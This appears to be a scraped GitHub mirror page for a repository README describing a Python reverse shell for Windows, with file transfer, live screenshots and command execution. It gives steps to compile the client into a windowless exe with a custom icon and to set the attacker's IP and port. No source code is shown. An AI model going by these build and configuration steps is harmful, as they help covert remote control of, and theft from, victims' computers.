cy4nguy / PythonReverseShellDotpy

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PythonReverseShellDotpy


___  _   _ ____ ____ _  _ ____ ____ ____ ____ ____ _  _ ____ _    _     ___  _   _ 
|__]  \_/  |__/ |___ |  | |___ |__/ [__  |___ [__  |__| |___ |    |     |__]  \_/  
|      |   |  \ |___  \/  |___ |  \ ___] |___ ___] |  | |___ |___ |___ .|      |                                                           

Yes, another Python reverse shell.

About: This is TCP REVERS SHELL Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows XP
Date of Publish : 11/23/2019
Last Update : 11/23/2019
Features: Send/get files, get live screenshot form user
basic system commands, and more.
Went Find out about what is Revers Shell

   When Find out about what is Revers Shell ? -> Click Hare <- 


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Shell_C.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

ToDo :

Open Shell_S.py: and Replace these lines with your own IP address


HOST = "YOUR IP"
PORT = 4489

NOTE : DO this for Shell_c.py two.

Before Converting File to exe Run : pip install --user --requirement requirements.txt

NOTE: THIS SOURCE CODE IS For Educational Purposes Only.
IM NOT RESBONBLE FOR ANY BAD & MALICIOUS USE OF IT.

About

License:GNU General Public License v3.0


Languages

Language:Python 100.0%